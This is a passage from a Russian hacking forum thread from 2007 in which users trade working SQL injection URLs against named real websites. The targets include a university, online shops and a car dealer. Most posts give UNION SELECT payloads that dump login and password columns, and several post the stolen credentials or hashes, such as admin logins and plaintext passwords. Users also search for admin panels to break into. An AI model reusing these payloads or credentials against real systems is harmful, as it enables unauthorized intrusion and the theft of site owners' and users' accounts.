ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

sql-inj
  #1881  
Старый 13.04.2007, 23:47
Аватар для Серенький
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql-inj

Новосибирский Гос Тех Университет
Сайт: http://inform.nstu.ru/
уязвимость: http://inform.nstu.ru/index.php?type=ubilei&stat=1'
подобранные таблицы: users
подобранные поля: login,password
7 организмов
Цитата:
http://inform.nstu.ru/index.php?type=ubilei&stat=-1%20union%20select%201,2,concat(login,char(58),pas sword),4,5,6,7,8,9,0,1,2,3%20from%20users%20limit% 200,1/*
нулевой организм: ZiF:0b2fdf29656163be070897c655defc12 rockme
 
Ответить с цитированием

sql-not_finished
  #1882  
Старый 14.04.2007, 00:19
Аватар для Серенький
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql-not_finished

Незавершенное:

Сайт: http://www.step-into-the-future.ru/ (олимпиада "Шаг в будущее")
Информация: (stepin@aqua2.di-net.ru:4.0.26)
Цитата:
http://www.step-into-the-future.ru/frb_light/view_all_topic.php?&mid=-1&t=&text_po isk=&m_id=-534+union+select+1,2,3,4,concat_ws(0x3a,user(),ver sion()),6,7,8/*
Сайт: http://www.idance.ru/ (Портал современных танцев iDance)
Информация: (idancer_idancedb@localhost:4.1.22)
Цитата:
http://www.idance.ru/show.php?id_s=-15+union+select+concat_ws(0x3a,user(),version()),2/*
Сайт: http://www.kif-daks.ru/ (Оптовая торговля книгами. КИФ-Дакс)
Информация: (mataru@localhost:4.1.20-lk-log)
Цитата:
http://www.kif-daks.ru/newprew.php?id=-336+union+select+1,concat_ws(0x3a,user(),version() ),3,4,5,6,7,8/*
Кто продвинется, пишем.

Последний раз редактировалось Koller; 14.04.2007 в 04:41..
 
Ответить с цитированием

  #1883  
Старый 14.04.2007, 04:31
Аватар для KPOT_f!nd
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

Код:
http://opel.avto-city.ru/catalog.php?id=-3+union+select+login,2,pass,4,5,6,7+from+admin/*
opel:reklama
Автоцентр Сити - официальный дилер Opel (Опель)
 
Ответить с цитированием

  #1884  
Старый 14.04.2007, 08:20
Аватар для }{0TT@БЬ)Ч
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию

Код:
http://www.seredina.ru/index.php?id=1&city_id=-12+union+select+concat(login,char(58),pwd)+from+admins/*
хороша дружно ищем админку
 
Ответить с цитированием

  #1885  
Старый 14.04.2007, 08:55
Аватар для Joker-jar
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659

Репутация: 646


Отправить сообщение для Joker-jar с помощью ICQ
По умолчанию

Цитата:
http://comedy.perm.ru/main/index.html?pg=7&nid=-1+union+select+1,2,3,version(),5,6,7/*
Мышка, ****, норушка (с) Галыгин.

P.S. Ничего интересного по части таблиц так и не нашел...
 
Ответить с цитированием

sql-inj
  #1886  
Старый 14.04.2007, 09:51
Аватар для Серенький
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql-inj

Сайт: http://www.audiobookz.ru/
уязвимость: http://www.audiobookz.ru/show_r.php?r=1'
подобранные таблицы: users
подобранные поля: login,pas,uid,name
Цитата:
http://www.audiobookz.ru/show_r.php?r=1+union+select+concat_ws(0x3a,uid,nam e,login,pas)+from+users/*
есть админка http://www.audiobookz.ru/admin/ , но не пашет.
 
Ответить с цитированием

  #1887  
Старый 14.04.2007, 10:09
Аватар для Isis
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


Cool

www.equipnet.ru
Код:
http://www.equipnet.ru/show_firm.php?firm_id=-23638+union+select+concat(convert(version()+using+cp1251),char(59),database(),char(59),user())/*

Последний раз редактировалось Isis; 14.04.2007 в 10:31..
 
Ответить с цитированием

cont
  #1888  
Старый 14.04.2007, 10:19
Аватар для Серенький
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
По умолчанию cont

comedy
Цитата:
Сообщение от Joker-jar  
Мышка, ****, норушка (с) Галыгин.

P.S. Ничего интересного по части таблиц так и не нашел...
Нашел таблицы news, ibf_members, ibf_admin_sessions и т.д. но походу ibf_* не от того форума, который действует на сайте.

Цитата:
http://comedy.perm.ru/main/index.html?pg=7&nid=-1+union+select+1,2,3,concat_ws(0x3a,id,name,passwo rd,email,ip_address),5,6,7+from+ibf_members+limit+ 1,1/*

Последний раз редактировалось Серенький; 14.04.2007 в 10:21..
 
Ответить с цитированием

  #1889  
Старый 14.04.2007, 10:32
Аватар для Isis
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


Cool

www.photodom.com
Код:
http://www.photodom.com/mypage.php?nick=Font'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19,user(),database(),22,23,24,25,26,27,28,29/*
www.coffeeblues.ru
Код:
http://www.coffeeblues.ru/news/index.php3?id=-31+union+select+1,2,concat(database(),char(58,58),user(),char(58,58),version()),4,5,6,7,8,9,10,11,12/*
www.super.com.ua
Код:
http://www.super.com.ua/local/plug-in/a-price/showone.php?groupid=65&id=-21096+union+select+1,2,3,4,5,6,7,8,9,concat(database(),char(58,58),user(),char(58,58),version()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*

Последний раз редактировалось Isis; 14.04.2007 в 10:56..
 
Ответить с цитированием

  #1890  
Старый 14.04.2007, 13:00
Аватар для n1†R0x
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

apelsinclub.ru
Код:
http://www.apelsinclub.ru/show.php?event=-1+union+select+1,2,3,concat(nick,0x3a,pwd),5,6,7+from+users/*
pwd=email в форме логина.
пароли в чистом виде
admin:uuu
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ